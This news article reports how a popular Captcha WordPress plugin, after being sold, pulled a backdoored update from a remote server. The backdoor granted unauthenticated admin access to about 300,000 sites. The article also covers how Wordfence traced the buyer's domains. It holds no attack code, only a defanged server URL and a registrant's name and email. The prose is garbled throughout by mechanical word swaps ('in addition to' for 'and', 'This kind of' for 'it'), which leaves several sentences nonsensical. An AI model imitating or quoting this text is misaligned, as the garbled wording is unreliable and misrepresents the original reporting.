Buying well-known plugins which has a large user-base in addition to using This kind of for effortless malicious campaigns have become a brand new trend for bad actors.
One such incident happened recently when the renowned developer BestWebSoft sold a well-known Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download in addition to install a hidden backdoor.
In a blog post published on Tuesday, WordFence security firm revealed why WordPress recently kicked a well-known Captcha plugin with more than 300,000 active installations out of its official plugin store.
While reviewing the source code of the Captcha plugin, WordFence folks found a severe backdoor that will could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.
The plugin was configured to automatically pull an updated “backdoored” edition through a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation through the official WordPress repository without site admin consent.
This kind of backdoor code was designed to create a login session for the attacker, who is actually the plugin author in This kind of case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using This kind of plugin) remotely without requiring any authentication.
“This kind of backdoor creates a session with user ID 1 (the default admin user that will WordPress creates when you first install This kind of), sets authentication cookies, in addition to then deletes itself’” reads the WordFence blog post. “The backdoor installation code is actually unauthenticated, meaning anyone can trigger This kind of.”
Also, the modified code pulled through the remote server is actually almost identical to the code in legitimate plugin repository, therefore “triggering the same automatic update process removes all file system traces of the backdoor,” producing This kind of look as if This kind of was never there in addition to helping the attacker avoid detection.
The reason behind the adding a backdoor is actually unclear at This kind of moment, although if someone pays a handsome amount to buy a well-known plugin which has a large user base, there must be a strong motive behind.
In similar cases, we have seen how organized cyber gangs acquire well-known plugins in addition to applications to stealthy infect their large user base with malware, adware, in addition to spyware.
While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that will the simplywordpress[dot]net domain serving the backdoor file was registered to someone named “Stacy Wellington” using the email address “scwellington[at]hotmail.co.uk.”
Using reverse whois lookup, the researchers found a large number of additional domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, in addition to Social Exchange.
What’s interesting? All of the above-mentioned domains booked under the user contained the same backdoor code that will the WordFence researchers found in Captcha.
WordFence has teamed up with WordPress to patch the affected edition of Captcha plug-in in addition to blocked the author through publishing updates, so websites administrators are highly recommended to replace their plugin with the latest official Captcha edition 4.4.5.
WordFence has promised to Discharge in-depth technical details on how the backdoor installation in addition to execution works, along which has a proof-of-concept exploit after 30 days producing sure that will admins get enough time to patch their websites.